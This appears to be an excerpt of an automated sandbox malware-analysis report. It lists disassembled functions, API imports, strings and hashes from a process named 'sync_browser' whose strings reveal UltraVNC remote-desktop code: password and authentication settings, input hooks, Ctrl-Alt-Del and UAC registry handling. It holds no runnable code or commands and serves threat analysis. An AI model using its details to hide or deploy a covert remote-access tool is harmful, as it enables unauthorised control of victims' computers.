                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep_errno
                                                                                          • String ID:
                                                                                          • API String ID: 1068366078-0
                                                                                          • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                                          • Instruction ID: 7fa18ebfa1342a6d6834f21a0f6aae3862b7dcb641567cadb561bcefd12e7b83
                                                                                          • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                                                          • Instruction Fuzzy Hash: C7014B27A34A8186EA559B17A84006DB6A5EBA8FD0B591531FE5D43BA0CF3CE895C700
                                                                                          APIs
                                                                                          • malloc.LIBCMT ref: 00007FF67E8792C7
                                                                                            • Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
                                                                                            • Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
                                                                                            • Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8
                                                                                            • Part of subcall function 00007FF67E877DE8: _errno.LIBCMT ref: 00007FF67E877E00
                                                                                            • Part of subcall function 00007FF67E877DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877E0C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$AllocHeap_callnewh_invalid_parameter_noinfomalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2392878220-0
                                                                                          • Opcode ID: e3a64b8f513c80d9bca10802794e1cd82fac0bb9dd7e2a98fdd0c60ab68321e3
                                                                                          • Instruction ID: 879515658a8d635f02268e9b7eebd2caa4bbab29fabb1a6d6212321a704cfb5c
                                                                                          • Opcode Fuzzy Hash: e3a64b8f513c80d9bca10802794e1cd82fac0bb9dd7e2a98fdd0c60ab68321e3
                                                                                          • Instruction Fuzzy Hash: 44F0F423B2968241FB14D6BDA00177AE2919F647C0F488534FF1C86B95EE2CD4058700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                                                          • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                                          • API String ID: 341937111-959611688
                                                                                          • Opcode ID: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                                          • Instruction ID: d8797ed3516da8e6b0c3511a736060dee50d554a9cb8338999d8a2905b1180a1
                                                                                          • Opcode Fuzzy Hash: bebf3fc636e9cd23de96e3967fec53c36efb0386d47568ff00354e72abbf8240
                                                                                          • Instruction Fuzzy Hash: 8FC20D66A78A5B91EF008B55E8544F4F364FB64788F805432F90E936ACEE7DE20ED740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
                                                                                          • String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
                                                                                          • API String ID: 3632263120-2889214834
                                                                                          • Opcode ID: d4ed9fe43cca48582b590be94b5749f1204be8c5f11941ab6a3d02875c788bcb
                                                                                          • Instruction ID: ba414f46b00ae9ba423f8239be4c425ce85932e01459046ef8bbffa6d6c4aa26
                                                                                          • Opcode Fuzzy Hash: d4ed9fe43cca48582b590be94b5749f1204be8c5f11941ab6a3d02875c788bcb
                                                                                          • Instruction Fuzzy Hash: FE528E33A28B8695EB50CF64E8486A973A9FF68744F410536FA4D937A4EF3CE549C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                                          • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                                          • API String ID: 1732492099-311746058
                                                                                          • Opcode ID: 20d6492d90d5a74a6e5ba01d3dc958018533303475cbf5015b09960a1b1236a9
                                                                                          • Instruction ID: ca6d804bffaa78476b60e3e9b247802d244c81012f69b57c13455151b14098ca
                                                                                          • Opcode Fuzzy Hash: 20d6492d90d5a74a6e5ba01d3dc958018533303475cbf5015b09960a1b1236a9
                                                                                          • Instruction Fuzzy Hash: 91F18C37A28B4285EB20CF65E8442A973A5FF64754F540236EA5EC7BA4DF3CE559C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Item$Move$Long$Text$DialogForegroundMessageRectSend_snprintf$InfoInvalidateLoadScrollShowString
                                                                                          • String ID: Chat with <%s> - UltraVNC$MS Sans Serif
                                                                                          • API String ID: 3122538718-446500584
                                                                                          • Opcode ID: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                                          • Instruction ID: f460e8b8138011fcfb5fe7e65ca52a673d81de9ad6fc47a67845fb7a93cb79a4
                                                                                          • Opcode Fuzzy Hash: 36d5dedeaafecd704d5ccace325cb0965bf20f8b169c0f54af0df3c2fc8c3945
                                                                                          • Instruction Fuzzy Hash: 22F1A076B2864286EB64DB6AE40437977A1FB98B94F544131EE0E87BA4DF3CE44DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                                                          • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                                                          • API String ID: 767217470-2348971971
                                                                                          • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                                          • Instruction ID: 06cde7bcb3ee169eb7ec5758f237358214d74f5e8419bf362eeca49ada5fb3e1
                                                                                          • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                                          • Instruction Fuzzy Hash: B8C18F2BE29B8281FA65DF65E854279A3A4FFA5B50F540135F95E836A4CF3CE44EC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
                                                                                          • String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
                                                                                          • API String ID: 384463373-239428621
                                                                                          • Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                                          • Instruction ID: f3c6926bccae64b6a146048276d190b0a5f97125c9e3218bcccc158fe38f81ab
                                                                                          • Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                                          • Instruction Fuzzy Hash: 74B1A027E28A4286FB64CB24E8042BAA3A5FFA4755F544131EA5E87794DF3CE54EC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                                                          • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                                          • API String ID: 27940619-3388178877
                                                                                          • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                                          • Instruction ID: 3c43da4b3ffc489f1a8d26ec5595bdcd909a1941a877cacf986ffc28b96320c7
                                                                                          • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                                          • Instruction Fuzzy Hash: 1FC19137A2868395FB10CF29E8442BA77A5FB64798F544135FA4E8B694EF3CE509C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
                                                                                          • String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
                                                                                          • API String ID: 2898369102-3720325205
                                                                                          • Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                                          • Instruction ID: 314a80799a93c951bae287f56f8d048844715343a0d4a1fb5a714e6de9478a0c
                                                                                          • Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                                          • Instruction Fuzzy Hash: 7BA1093AA29A8386E760DF25E8502BAA3A4FFA9740F544136F95DC7A54DF3CE44DC700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseEmptyOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1427272684-0
                                                                                          • Opcode ID: 50094a2eca30ad614fd31ac1fd7d0e43873141adc59b21ba776c54e127e2d339
                                                                                          • Instruction ID: 46aae11ab3baa54999f0d7ed3a161bacb9f64eb9a8661aa52e38dac2dcdfca92
                                                                                          • Opcode Fuzzy Hash: 50094a2eca30ad614fd31ac1fd7d0e43873141adc59b21ba776c54e127e2d339
                                                                                          • Instruction Fuzzy Hash: FEC16322B19B4296FA10DF65E8541BDA3ADBF69B84F444135EE0E877A5EF3CE448C340
                                                                                          APIs
